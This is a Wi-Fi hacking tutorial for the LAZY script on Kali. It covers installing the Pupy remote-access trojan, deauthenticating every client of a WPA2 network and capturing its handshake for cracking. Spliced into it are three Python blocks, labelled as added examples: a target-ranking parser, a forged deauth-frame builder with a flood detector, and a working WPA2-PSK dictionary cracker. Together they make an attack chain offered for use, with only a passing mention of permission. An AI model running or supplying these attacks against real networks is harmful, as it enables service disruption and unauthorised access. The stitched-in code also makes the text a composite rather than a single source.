
How to Make Wi-Fi & Networks Easier with Lazy Script «Null Byte :: WonderHowTo



Wi-Fi tools are becoming more accessible to beginners, and the LAZY script is a framework that makes a set of serious penetration-testing tools easy to explore from a single menu. From installing new add-ons to grabbing a WPA handshake, most tasks take only seconds, and the script itself is easy to install, set up and use.

Attack Framework

Most new Wi-Fi hacking tools build on the same handful of underlying attacks, and the scripts that automate more familiar tools such as Aireplay-ng are often referred to as frameworks. These frameworks try to organize the tools in an intelligent or useful way so that the result goes beyond the functionality or usability of the original programs.

A good example is a program that chains a scanning tool such as airodump-ng, an attack such as WPS Pixie-Dust, and a cracking tool such as Aircrack-ng into an attack chain a beginner can follow. This makes the process easier to remember and can be viewed as a kind of guided walkthrough. Although each of these attacks is possible without the hand-holding, the result can be faster or more convenient than doing it all yourself.

One such framework is Airgeddon, a wireless attack framework that does useful things such as automating target selection and removing the time a user spends copying and pasting information between programs. This saves experienced pentesters valuable time but has the disadvantage that beginners do not learn what is happening "under the hood" of the attack. Even so, most of these frameworks are fast, efficient and easy to use, so even a beginner can take a whole network offline.

UX / UI Improvements for Beginners

I'll go through a new script that tries to create a friendlier method for beginners to start with some of the best and most reliable hacking techniques. While the script is designed to be as "lazy" as possible, requiring a minimum of user interaction, it is also useful and powerful for novice or experienced users who want to perform a penetration test quickly.

The focus in attack frameworks is to better anticipate what the hacker is trying to do and gather the necessary tools to execute the attack with a minimum of user interaction. In this way, the user interface and experience become the main goal, and the purpose of the script is to anticipate the tools and tactics a penetration tester would need to quickly access in the field.

The LAZY script starts when you type the letter l in a terminal window; on the first run it asks for the names of your network interfaces. It uses the names you supply to hand the right interface to the tools that carry out the attacks you select. Apart from this initial input, most attacks are launched simply by choosing the option number from a menu. That means you can grab a network handshake or download a new hacking tool like Pupy just by picking a menu option.

Extending Usability & Curating Applications

The benefit of the LAZY script is that it was built with penetration testers in mind, so it is essentially a guided tour of some of the best and most powerful scripts available today. Among the most accessible menu options is quick access to network information such as the gateway IP (usually the router), your own IP and MAC address, and an ARP scan that lists the other devices on the network.

The main submenus are also organized by function so a pentester has easy access to what they need. The general focus is on handshakes, WPS PIN attacks, WEP attacks, MitM attacks and the Metasploit framework. Anonsurf is also included for anonymizing Internet traffic through Tor, and social engineering attacks such as email spoofing are provided. If a tool appears in red, it is not installed yet. To get it, select it and type install, and the script does the rest, as in this installation of Dagon:

  Tool is not installed. To install it, type 'install'.
  install
  Installing Dagon
  Tool by Ekultek
  Cloning into 'Dagon'...
  remote: Counting objects: 1236, done.
  remote: Total 1236 (delta 0), reused 0 (delta 0), pack-reused 1235
  Receiving objects: 100% (1236/1236), 319.35 KiB | 1.76 MiB/s, done.
  Resolving deltas: 100% (666/666), done.
  Collecting pysha3==1.0.2 (from -r requirements.txt (line 1))
    Downloading https://files.pythonhosted.org/packages/c5/bb/7d793dfab828e01adb46e3c5976fe99acda12a954c728427cceb2acd7ee9/pysha3-1.0.2-cp27-cp27mu-manylinux1_x86_64.whl (127kB)
      100% |████████████████████████████████| 133kB 1.5MB/s
  Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
  Collecting colorlog==2.10.0 (from -r requirements.txt (line 3))
    Downloading https://files.pythonhosted.org/packages/61/ff/d6337d488739c1a7ade37f736880e44717bcb0e7cea178c17774a4a93700/colorlog-2.10.0-py2.py3-none-any.whl
  Requirement already satisfied: passlib==1.7.1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
  Collecting bcrypt==3.1.3 (from -r requirements.txt (line 5))
    Downloading https://files.pythonhosted.org/packages/a6/da/5d7ac371b4c9a8ac9e8ea62cff7c090e9d7d7b7ea3f2ad8b8c8da65db058/bcrypt-3.1.3-cp27-cp27mu-manylinux1_x86_64.whl (57kB)
      100% |████████████████████████████████| 61kB 9.9MB/s
  Requirement already satisfied: six>=1.4.1 in /usr/lib/python2.7/dist-packages (from bcrypt==3.1.3->-r requirements.txt (line 5))
  Collecting cffi>=1.1 (from bcrypt==3.1.3->-r requirements.txt (line 5))
    Downloading https://files.pythonhosted.org/packages/14/dd/3e7a1e1280e7d767bd3fa15791759c91ec19058ebe31217fe66f3e9a8c49/cffi-1.11.5-cp27-cp27mu-manylinux1_x86_64.whl (407kB)
      100% |████████████████████████████████| 409kB 2.1MB/s
  Collecting pycparser (from cffi>=1.1->bcrypt==3.1.3->-r requirements.txt (line 5))
    Downloading https://files.pythonhosted.org/packages/8c/2d/aad7f16146f4197a11f8e91fb81df177adcc2073d36a17b1491fd09df6ed/pycparser-2.18.tar.gz (245kB)
      100% |████████████████████████████████| 256kB 2.8MB/s
  Building wheels for collected packages: pycparser

Step 1: Upgrading Kali Linux

To use the LAZY script, you need a fully updated installation of Kali Linux. The script comes with a very helpful installer, and I was able to set it up both on a laptop running Kali as its primary operating system and in a virtual machine without any problems.

If your Kali system is fully updated, you can generally expect a fairly smooth installation. Make sure your system is up to date by running the following commands before you begin.

  apt update
apt upgrade 

Step 2: Find the name of your wireless network adapter

In the script, you must specify the name of the network adapter to use and the name the system gives that adapter when it is in monitor mode. This may take some troubleshooting. Normally, a Kali-compatible adapter shows up as wlan0 or wlan1 and is renamed to wlan0mon or wlan1mon when airmon-ng puts it into monitor mode. Sometimes, though, wlan0 stays wlan0 and is not renamed in monitor mode (for example when the mode is switched with iwconfig rather than airmon-ng). In that case you need to tell the LAZY script, or it will fail because it tries to use a wlan0mon interface that does not exist.

You can check what name your adapter has after putting it into monitor mode with the following commands, where wlan0 is the name of your adapter:

  ip link set wlan0 down          # the interface must be down before its mode can be changed
  iwconfig wlan0 mode monitor     # switch to monitor mode (iwconfig does not rename the interface)
  ip link set wlan0 up
  ip a                            # list all interfaces and note the name the adapter now has

Once you know the name of the adapter and the name in monitor mode, we can start downloading and using the "lazy" script.

Step 3: Install and Configure Lazy Script

Installing the LAZY script is incredibly easy. Open a terminal window and enter the following commands one at a time. They change to your home directory, clone the LAZY script from GitHub, cd into the lscript folder, give install.sh execute permission, and then run the installer.

  cd                      # go to the home directory (root's, on a default Kali install)
  git clone https://github.com/arismelachroinos/lscript.git
  cd lscript
  chmod +x install.sh     # make the installer executable
  ./install.sh

When this is done, you should be able to open a new terminal window and type the letter l to open the LAZY script. The first time you install or reinstall the script, you need to answer a few prompts along the way and then set up your network interfaces. Not bad for a script designed around minimal user interaction.

When you are asked for the interfaces, enter the name of your wireless adapter in managed mode, its name in monitor mode, and then the name of your Ethernet adapter.

You can change these later with the interfaces option if you want to add another network adapter or switch between the internal and external card. Once this is set, you can start working with the LAZY script.

Step 4: Use Basic Network Tools

From the main menu we can pull information about the network we are currently connected to and about our network interfaces. Typing l shows local IP information:

  Local IP addresses:
eth0 = 192.168.86.42

gateways:
eth0 = 192.168.86.1
Press any key to go back ... 

This will allow us, for example, to search the network for other devices. This part of the LAZY script gives us better network visibility and situational awareness about what devices are around us. The various pieces of information can be broken down as follows:

  • if – Runs ifconfig and gives the names and information about all network devices
  • 1 – Enable wlan0 (d1 disables it)
  • 2 – Enable wlan0mon (d2 disables it)
  • 3 – Randomize the MAC address or set it to a specific value
  • 7 – Display the public IP address your computer presents to the websites it visits
  • Look up the geographic location of a specific IP address
  • Launch an ARP scan of the local network to find nearby devices
  • start – Start the monitor mode on the wireless network adapter.
  • stop – Stop wireless monitoring mode on the network adapter.

Step 5: Install New Tools

Part of the fun of the LAZY script is how easy it is to add new tools to our arsenal. To demonstrate this, we'll download Pupy, a Python-based RAT designed to take control of other computers on the network. Select option 9 to open the list of tools in the LAZY script.

In the next menu, the tools are divided into major categories, with options for managing the installation of scripts. The options presented are:

  • 1 – Wi-Fi tools (tools for attacking wireless networks)
  • 2 – Remote access (tools to access other devices remotely and manage them from afar)
  • 3 – Information gathering (collecting information about individuals or websites)
  • 4 – Website tools (tools for exploiting or attacking websites)
  • 5 – Other (a collection of other hacking tools)

You can also manage your installed tools with option 6. To download Pupy, go to option 2, remote access. This lists the remote access tools, and Pupy is option 3. It appears in red, which means it is not installed yet.

To install Pupy, select 3 and, when prompted, type install; the LAZY script handles the installation for you.

  Tool is not installed. To install it, type 'install'.
  install
  Installing Pupy
  Tool by n1nj4sec
  Cloning into 'pupy'...
  remote: Counting objects: 16472, done.
  remote: Compressing objects: 100% (35/35), done.
  remote: Total 16472 (delta 20), reused 47 (delta 20), pack-reused 16416
  Receiving objects: 100% (16472/16472), 27.77 MiB | 4.99 MiB/s, done.
  Resolving deltas: 100% (11706/11706), done.

Once completed, the option should be green, and you can use it via LAZY script. Now we can select the option 3 and immediately jump into Pupy to start creating listeners and payloads.

  1) Create a payload
  2) Start the listener
  b) Go back
  00) Main menu
  0) Exit

We can now enter 00 to return to the main menu to explore more features of the LAZY script.

Step 6: Capturing a WPA Handshake with a Lazy Script

The last feature of the LAZY script I'll cover is its quick and easy way to capture a WPA handshake for cracking later. This is useful for attacking a WPA network, by far the most common type of Wi-Fi network you will encounter. With this technique, you quickly kick a device off the target network and capture the handshake as it reconnects.

With that handshake you can then run an offline dictionary or brute-force attack against the passphrase. The fact that the handshake can be captured and attacked offline is one of the most serious weaknesses of WPA and WPA2 with a pre-shared key, and one of the main things the newer WPA3 fixes.

Back in the main menu, we can try the menu option designed to capture a WPA (or WPA2) handshake for later cracking. If you have a Kali-compatible wireless adapter, you should have given its name to the LAZY script in step 3 above; if not, type interfaces now and enter the adapter's name in managed (station) and monitor mode.

Once that is set, select 10 to open the handshake menu. First, confirm that you want to put the adapter into monitor mode if you haven't already; simply enter y and the script switches it. A new terminal window then opens, showing that no network is selected yet and a list of options.

  ---------------------------- HANDSHAKE ----------------------------
  1) Scan nearby networks                      Selected: None
  2) Capture the handshake
  3) Aircrack the handshake
  4) Check a handshake
  5) Clean a handshake
  6) Remove .csv and .netxml files
  0) Exit
  Select:

Select option 1 to scan for nearby networks and you will see the traffic from the networks around you. Let it run for a minute or two, then press Ctrl-C to stop the scan.

  CH 12 ][ Elapsed: 6 s ][ 2018-07-04 04:33

  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

  00:25:00:FF:94:73   -1        0        1    0   6  -1   OPN
  70:3A:CB:DB:5A:78  -41       11        3    0  11  130  WPA2 CCMP   PSK  takeyourgodd
  70:3A:CB:DB:5C:A8  -59       22        0    0   6  130  WPA2 CCMP   PSK  takeyourgodd
  70:3A:CB:DB:5C:B4  -71        6        0    0   1  130  WPA2 CCMP   PSK  takeyourgodd
  C4:8E:8F:E5:6A:B4  -75        7        0    0   1  195  WPA2 CCMP   PSK  TG1672G12

  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

  00:25:00:FF:94:73  (redacted)         -43    0 -12      21       8
  00:25:00:FF:94:73  (redacted)         -33    0 -12     104       4
  00:25:00:FF:94:73  (redacted)         -51    0 -12     107       4
  00:25:00:FF:94:73  (redacted)         -53    0 -12      34       8
  (not associated)   (redacted)         -70    0 - 1      12       8

You now have a list of networks and their traffic from which to pick a target for the next stage of the attack; the listing is color coded to help. Enter the number of the target network and press Return to continue. Note that you can come back to this screen in a later step by entering b, so you can select a different network without scanning again.
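
The target selection the LAZY script automates here (pick a PSK-protected network that has clients and a strong signal) is easy to do programmatically from the .csv file airodump-ng writes next to its capture, the same file that option 6 in the handshake menu deletes. The Python below is an added example, not code from this article or from the lscript project; the CSV text is constructed to match the scan above, with made-up station MACs, timestamps and ID lengths.

```python
import csv

# Constructed sample in the layout of an airodump-ng CSV export: an AP table, a blank
# line, then a station table. AP rows mirror the scan above; station MACs, timestamps
# and ID lengths are invented for this example.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:25:00:FF:94:73, 2018-07-04 04:33:01, 2018-07-04 04:33:40,  6,  -1, OPN , , , -1,  0, 1,   0.  0.  0.  0,  0, ,
70:3A:CB:DB:5A:78, 2018-07-04 04:33:01, 2018-07-04 04:33:41, 11, 130, WPA2, CCMP, PSK, -41, 11, 3,   0.  0.  0.  0, 23, takeyourgoddamnshoesoff,
70:3A:CB:DB:5C:A8, 2018-07-04 04:33:02, 2018-07-04 04:33:41,  6, 130, WPA2, CCMP, PSK, -59, 22, 0,   0.  0.  0.  0, 23, takeyourgoddamnshoesoff,
70:3A:CB:DB:5C:B4, 2018-07-04 04:33:02, 2018-07-04 04:33:39,  1, 130, WPA2, CCMP, PSK, -71,  6, 0,   0.  0.  0.  0, 23, takeyourgoddamnshoesoff,
C4:8E:8F:E5:6A:B4, 2018-07-04 04:33:03, 2018-07-04 04:33:40,  1, 195, WPA2, CCMP, PSK, -75,  7, 0,   0.  0.  0.  0,  9, TG1672G12,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:11:22:33:44:55, 2018-07-04 04:33:05, 2018-07-04 04:33:41, -72,  22, 70:3A:CB:DB:5A:78,
02:11:22:33:44:66, 2018-07-04 04:33:06, 2018-07-04 04:33:40, -43,   8, 00:25:00:FF:94:73,
02:11:22:33:44:77, 2018-07-04 04:33:07, 2018-07-04 04:33:38, -70,  12, (not associated), takeyourgoddamnshoesoff
"""


def parse_airodump_csv(text):
    """Return (aps, stations) from airodump-ng CSV text.

    aps maps BSSID -> dict with channel, privacy, cipher, auth, power, essid and the
    list of associated client MACs; stations is a list of dicts."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    split = next(i for i, ln in enumerate(lines) if ln.startswith("Station MAC"))
    # airodump-ng separates fields with ", ", so skipinitialspace handles the padding.
    ap_rows = csv.reader(lines[1:split], skipinitialspace=True)
    sta_rows = csv.reader(lines[split + 1:], skipinitialspace=True)
    aps = {}
    for r in ap_rows:
        if len(r) < 14:
            continue
        aps[r[0].strip()] = {
            "channel": int(r[3]), "privacy": r[5].strip(), "cipher": r[6].strip(),
            "auth": r[7].strip(), "power": int(r[8]), "essid": r[13].strip(), "clients": [],
        }
    stations = []
    for r in sta_rows:
        if len(r) < 6:
            continue
        sta = {"mac": r[0].strip(), "power": int(r[3]), "bssid": r[5].strip()}
        stations.append(sta)
        if sta["bssid"] in aps:           # "(not associated)" never matches an AP
            aps[sta["bssid"]]["clients"].append(sta["mac"])
    return aps, stations


def rank_handshake_targets(aps):
    """Order BSSIDs the way a tester would for a handshake capture: PSK networks only
    (open networks have no handshake; enterprise/802.1X needs a different attack),
    most connected clients first, then strongest signal (PWR is dBm, so -41 beats -71)."""
    candidates = [(bssid, ap) for bssid, ap in aps.items()
                  if ap["privacy"].startswith("WPA") and ap["auth"] == "PSK"]
    candidates.sort(key=lambda item: (len(item[1]["clients"]), item[1]["power"]), reverse=True)
    return [bssid for bssid, _ in candidates]


if __name__ == "__main__":
    aps, _stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid in rank_handshake_targets(aps):
        ap = aps[bssid]
        print(f"{bssid}  ch {ap['channel']:>2}  {ap['power']:>4} dBm  "
              f"{len(ap['clients'])} client(s)  {ap['essid']}")
```

A network with no clients is a poor first choice: there is nobody to deauthenticate, so no handshake will appear no matter how long you wait, which is exactly the "(not associated)" case the ranking pushes to the bottom.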

After selecting the target network, either enter a filename to save the handshake under, or 0 to keep no file for this session. Pick a name you will remember later.

After typing a name and pressing Return, a new window opens with options for knocking devices off the network. Select option 1 to deauthenticate all clients and quickly grab the handshake. Make sure you have permission to test the network you are working on, because you are denying service to it until the handshake is captured. As the last input, choose the number of deauth packets to send, where 0 means a continuous stream until you stop it.

  ---------------- DEAUTH MENU ----------------

  1) Deauth all           aireplay-ng
  2) Deauth all           mdk3
  3) Deauth client/s      aireplay-ng
  4) Deauth all periodic  aireplay-ng
  0) Exit
  ------------------------------------------- HANDSHAKE -------------------------------------------

  CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:33

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

  70:3A:CB:DB:5A:78  -40  87      134       92    6  11  130  WPA2 CCMP   PSK  takeyourgodd

  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

  70:3A:CB:DB:5A:78  (redacted)         -72    0 - 0      22       6

A new window shows the status of the deauthentication attack. When "WPA handshake" appears in the top right corner of the airodump-ng window, you have captured the handshake for the network. Press Ctrl-C to stop the deauth attack.

  ---------------- DEAUTH MENU ----------------

  1) Deauth all           aireplay-ng
  2) Deauth all           mdk3
  3) Deauth client/s      aireplay-ng
  4) Deauth all periodic  aireplay-ng
  ENTER) Last option
  0) Exit
  ------------------------------------------- HANDSHAKE -------------------------------------------

  CH 11 ][ Elapsed: 2 mins ][ 2018-07-04 04:36 ][ WPA handshake: 70:3A:CB:DB:5A:78

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

  70:3A:CB:DB:5A:78   -7 100     1307      151    2  11  130  WPA2 CCMP   PSK  takeyourgodd

  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

  70:3A:CB:DB:5A:78  (redacted)         -33   1e- 1e      0      12
  --------------------------------- DEAUTHING ---------------------------------

  04:36:17  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:18  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:18  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:19  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:19  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:19  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:20  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:20  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:21  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:21  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:22  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:22  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:23  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
  04:36:23  Sending DeAuth (code 7) to broadcast -- BSSID: [70:3A:CB:DB:5A:78]
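
The deauth frames aireplay-ng is sending above are tiny: a 24-byte 802.11 management header plus a 2-byte reason code, with the AP's address forged as the transmitter. As an added example (not part of this article, aireplay-ng or lscript), the Python below builds such a frame, parses it back, and then, for the defensive side of the same attack, flags any transmitter that sends a burst of deauths inside a short window, which is how a wireless IDS notices this kind of attack. The BSSID is the one from the walkthrough; the client MAC, timestamps, duration value and thresholds are assumptions made for the example.

```python
import struct
from collections import defaultdict

# Frame control for a deauthentication frame: type 0 (management), subtype 12. The low
# byte of the little-endian field holds version/type/subtype; the high byte holds
# flags, which the parser ignores.
FC_DEAUTH_LOW_BYTE = 0xC0
REASON_CLASS3_FROM_NONASSOC = 7   # the reason code aireplay-ng uses ("code 7" above)
BROADCAST = b"\xff" * 6
HEADER_LEN = 24                   # FC, duration, addr1, addr2, addr3, sequence control


def build_deauth(bssid, target=BROADCAST, reason=REASON_CLASS3_FROM_NONASSOC, seq=0):
    """Raw bytes of a deauth frame like the ones aireplay-ng --deauth injects.
    addr1 is the receiver (broadcast hits every client), addr2 the forged transmitter
    (the AP) and addr3 the BSSID; the body is the 2-byte little-endian reason code.
    The duration value 0x013A is an arbitrary constructed choice."""
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH_LOW_BYTE, 0x013A, target, bssid, bssid, seq << 4)
    return header + struct.pack("<H", reason)


def parse_deauth(frame):
    """Return (receiver, transmitter, bssid, reason) if frame is a deauth, else None."""
    if len(frame) < HEADER_LEN + 2:
        return None
    fc, _duration, addr1, addr2, addr3, _seq, reason = struct.unpack("<HH6s6s6sHH", frame[:HEADER_LEN + 2])
    if fc & 0xFF != FC_DEAUTH_LOW_BYTE:
        return None
    return addr1, addr2, addr3, reason


def deauth_flood_sources(frames, timestamps, window=1.0, threshold=10):
    """Detection side: {transmitter: peak count} for every transmitter that sent more
    than `threshold` deauth frames within any `window` seconds. A real AP deauths a
    single client now and then; a broadcast deauth storm from one address is an attack."""
    seen = defaultdict(list)
    for ts, frame in zip(timestamps, frames):
        parsed = parse_deauth(frame)
        if parsed is not None:
            seen[parsed[1]].append(ts)
    flagged = {}
    for tx, times in seen.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):          # sliding window over the sorted times
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[tx] = peak
    return flagged


def sample_capture():
    """Constructed capture: a 16-frame broadcast deauth burst forged from the BSSID in
    the walkthrough, one single-client deauth (reason 3, station leaving) from another
    AP, and one data frame. Returns (frames, timestamps in seconds)."""
    attacker_bssid = bytes.fromhex("703acbdb5a78")
    other_ap = bytes.fromhex("c48e8fe56ab4")
    frames = [build_deauth(attacker_bssid, seq=i) for i in range(16)]
    times = [i * 0.05 for i in range(16)]
    frames.append(build_deauth(other_ap, target=bytes.fromhex("021122334455"), reason=3))
    times.append(3.0)
    frames.append(b"\x08\x00" + bytes(30))      # FC 0x0008: a data frame, ignored
    times.append(3.5)
    return frames, times


if __name__ == "__main__":
    frames, times = sample_capture()
    for tx, count in deauth_flood_sources(frames, times).items():
        print(f"deauth flood from {tx.hex(':')}: {count} frames within 1 s")
```

One caveat on the defensive side: a network with 802.11w (Protected Management Frames) enabled ignores forged deauths entirely, so the attack in this step only works against networks that have not turned it on.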

Back in the handshake menu, which now shows the selected network, we can verify the handshake we just captured by selecting option 4.

  ---------------------------- HANDSHAKE ----------------------------
  1) Scan nearby networks                      Selected: takeyourgoddamnshoesoff
  2) Capture the handshake
  3) Aircrack the handshake
  4) Check a handshake
  5) Clean a handshake
  6) Remove .csv and .netxml files
  0) Exit
  Select:

A small menu lists the tools you can use to verify that a complete handshake was captured. Select option 2 to check the handshake with cowpatty (option 1 does the same check with pyrit).

  ------- MENU -------

  1) Check with pyrit
  2) Check with cowpatty
  b) Go back
  Select:
  1
  ------------------------------------------- HANDSHAKE -------------------------------------------

  CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

  70:3A:CB:DB:5A:78  -40 100      156        0    0  11  130  WPA2 CCMP   PSK  takeyourgodd

  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Here you can see that our handshake is valid:

  ------- DEAUTH MENU -------

  Valid handshake found!
  ------------------------------------------- HANDSHAKE -------------------------------------------

  CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

  70:3A:CB:DB:5A:78  -37  96      297        0    0  11  130  WPA2 CCMP   PSK  takeyourgodd

  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

After confirming that the handshake is valid, you will be returned to the handshake menu. Select option 0 to terminate the script.

  ---------------------------- HANDSHAKE ----------------------------
  1) Scan nearby networks                      Selected: takeyourgoddamnshoesoff
  2) Capture the handshake
  3) Aircrack the handshake
  4) Check a handshake
  5) Clean a handshake
  6) Remove .csv and .netxml files
  0) Exit
  Select:

On the way out, the script asks whether you captured a WPA handshake. If you did, enter y to save it under the filename you specified earlier; otherwise the file is discarded. If you keep the file, you can also enter y to clean it, which shrinks the capture by dropping every packet that is not part of the handshake.

At this point we would normally use Aircrack-ng to launch a dictionary or brute-force attack against the handshake. I tried the LAZY script's built-in brute forcer, but it could not read the location of my dictionary file properly, so I do not recommend it in its current iteration.
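
To see why the captured handshake is enough to attack the passphrase offline, here is the computation Aircrack-ng performs for every wordlist entry, written out in Python. This is an added example, not code from this article, aircrack-ng or lscript: it stands in for the AP and client by building messages 1 and 2 of a WPA2 four-way handshake from a constructed passphrase, client MAC and nonces (the BSSID and SSID are the ones from the walkthrough), classifies the frames the way the "Check a handshake" step does, and then runs a small constructed wordlist against the captured MIC. It handles only WPA2 with CCMP (HMAC-SHA1 MIC); WPA/TKIP (HMAC-MD5) and the SHA-256 variants used with 802.11w and WPA3 are out of scope.

```python
import hashlib
import hmac
import struct

# Offsets inside an EAPOL-Key frame: 4-byte EAPOL header, then descriptor type (1),
# key info (2), key length (2), replay counter (8), nonce (32), IV (16), RSC (8),
# key ID (8), MIC (16), key data length (2), key data.
KEY_INFO_OFF, NONCE_OFF, MIC_OFF = 5, 17, 81
PAIRWISE, INSTALL, ACK, MIC, SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200
DESC_VER_HMAC_SHA1 = 2    # descriptor version 2: HMAC-SHA1-128 MIC (WPA2/CCMP)


def pmk_from_passphrase(passphrase, ssid):
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes): the expensive
    step that aircrack-ng and hashcat repeat once per wordlist entry."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from 802.11: HMAC-SHA1 over the label, a zero byte, the two MACs and two
    nonces in sorted order, and a counter byte; four outputs concatenated, cut to 64."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blob = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))
    return blob[:64]


def eapol_mic(kck, frame):
    """MIC over the whole EAPOL frame with the MIC field zeroed, keyed with the KCK
    (the first 16 bytes of the PTK)."""
    zeroed = frame[:MIC_OFF] + bytes(16) + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def handshake_message_number(frame):
    """Classify an EAPOL-Key frame as message 1-4 of the 4-way handshake from its Key
    Information flags; this is the kind of check behind "Check a handshake"."""
    key_info = struct.unpack(">H", frame[KEY_INFO_OFF:KEY_INFO_OFF + 2])[0]
    if not key_info & PAIRWISE:
        return None
    has_ack, has_mic, is_secure = key_info & ACK, key_info & MIC, key_info & SECURE
    if has_ack:
        return 3 if has_mic else 1
    if has_mic:
        return 4 if is_secure else 2
    return None


def crack_psk(ssid, ap_mac, sta_mac, frames, wordlist):
    """Offline dictionary attack. Needs M1 (carries the ANonce) and M2 (carries the
    SNonce and a MIC computed with the KCK). Returns the passphrase or None."""
    by_number = {handshake_message_number(f): f for f in frames}
    if 1 not in by_number or 2 not in by_number:
        return None                     # incomplete capture: nothing to test candidates against
    anonce = by_number[1][NONCE_OFF:NONCE_OFF + 32]
    m2 = by_number[2]
    snonce, captured_mic = m2[NONCE_OFF:NONCE_OFF + 32], m2[MIC_OFF:MIC_OFF + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2), captured_mic):
            return candidate
    return None


def _eapol_key_frame(key_info, nonce, mic=bytes(16)):
    body = struct.pack(">BHHQ", 2, key_info, 16, 1) + nonce + bytes(32) + mic + b"\x00\x00"
    return struct.pack(">BBH", 2, 3, len(body)) + body    # EAPOL version 2, type 3 = EAPOL-Key


def build_sample_handshake(ssid, passphrase, ap_mac, sta_mac, anonce, snonce):
    """Plays AP and client so the example runs offline; in a real test these two frames
    come out of the airodump-ng capture file."""
    m1 = _eapol_key_frame(DESC_VER_HMAC_SHA1 | PAIRWISE | ACK, anonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    m2 = _eapol_key_frame(DESC_VER_HMAC_SHA1 | PAIRWISE | MIC, snonce)
    m2 = m2[:MIC_OFF] + eapol_mic(kck, m2) + m2[MIC_OFF + 16:]
    return [m1, m2]


# Constructed inputs: the BSSID and SSID are the ones scanned above; the client MAC,
# nonces, passphrase and wordlist are made up for this example.
SSID = "takeyourgoddamnshoesoff"
AP_MAC, STA_MAC = bytes.fromhex("703acbdb5a78"), bytes.fromhex("021122334455")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = ["password", "letmein", "12345678", "shoesoff2018"]

if __name__ == "__main__":
    frames = build_sample_handshake(SSID, "shoesoff2018", AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("messages captured:", [handshake_message_number(f) for f in frames])
    print("recovered passphrase:", crack_psk(SSID, AP_MAC, STA_MAC, frames, WORDLIST))
```

The PBKDF2 step can be checked against the test vector in Annex H of IEEE 802.11: passphrase password with SSID IEEE gives a PSK starting f42c6fc5. Those 4096 HMAC-SHA1 rounds per candidate are the only thing slowing an attacker down, which is why a long random passphrase survives this attack and a dictionary word does not.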

Step 7: Using a WPS Pixie-Dust Attack

While the LAZY script includes a WPS module, the versions I tried in a virtual machine and on a Kali laptop could not crack our test WPS PIN. Two of the primary attacks returned "too many arguments" and no useful results. The last option, a Pixie-Dust loop, ended with an error after an anticlimactic build-up.

Network Hacking for the Lazy

The LAZY script tries to bring together the best tools used by hackers with a minimum of interaction, using a bundle of clever shell scripts. This makes the staple tactics of Wi-Fi hacking, such as WPA brute-forcing, accessible even to the most inexperienced users.

If you've gotten lazy at home with your own Wi-Fi security, this is a wake-up call to take things like your Wi-Fi password seriously. Do not choose a password that is easy or quick to guess, or one you have already used in many other places. If you need a refresher on how to protect your own Wi-Fi, you can read my previous guide to defending against the main types of Wi-Fi hacking, most of which the LAZY script automates.


